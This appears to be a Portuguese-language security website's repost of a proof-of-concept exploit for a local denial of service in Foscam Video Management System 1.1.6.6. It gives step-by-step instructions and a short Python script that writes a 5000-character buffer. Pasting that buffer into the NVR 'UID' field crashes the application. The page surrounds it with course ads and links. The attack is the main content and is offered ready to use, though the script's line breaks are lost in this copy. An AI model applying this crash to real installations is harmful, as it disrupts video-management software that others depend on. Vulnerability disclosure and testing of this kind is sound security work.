Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)

Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)

# Exploit Title: Sistema de gerenciamento de vídeo Foscam 1.1.6.6 – Negação de serviço ‘UID’ (PoC)
# Autor: Alessandro Magnosi
# Data: 2019-10-09
# Página inicial do fornecedor: https://www.foscam.com/
# Link do software: https://www.foscam.com/downloads/appsoftware.html?id=5
# Versão testada: 1.1.6.6
# Tipo de vulnerabilidade: Negação de serviço (DoS) local
# Testado no sistema operacional: Windows 7 SP1 x86 pt, Windows 10 Pro x64 it

# Passos para produzir o crash:
# 1.- Execute o código python: python foscam-vms-uid-dos.py
# 2.- Abra o FoscamVMS1.1.6.txt e copie seu conteúdo para a área de transferência
# 3.- Abrir o FoscamVMS
# 4.- Vá para Adicionar dispositivo
# 5.- Escolha o tipo de dispositivo “NVR”
# 6.- Copie o conteúdo do arquivo para o UID
# 7.- Clique em Login Check
# 8.- Caiu

#!/usr/bin/python buffer = "A" * 5000 f = open ("FoscamVMS1.1.6.txt", "w") f.write(buffer) f.close()

Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)

Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)

Categorias

Compartilhe esse post

Posts populares

Comandos Linux – Comando lzcat

Comandos Linux – Comando losetup

Comandos Linux – Comando logout

Comandos Linux – Comando logname

Comandos Linux – Comando login

Invista no seu futuro com nossos cursos!

Cursos Linux

Cursos de Segurança

Cursos de DevOps

Institucional

Conteúdos

Fale Conosco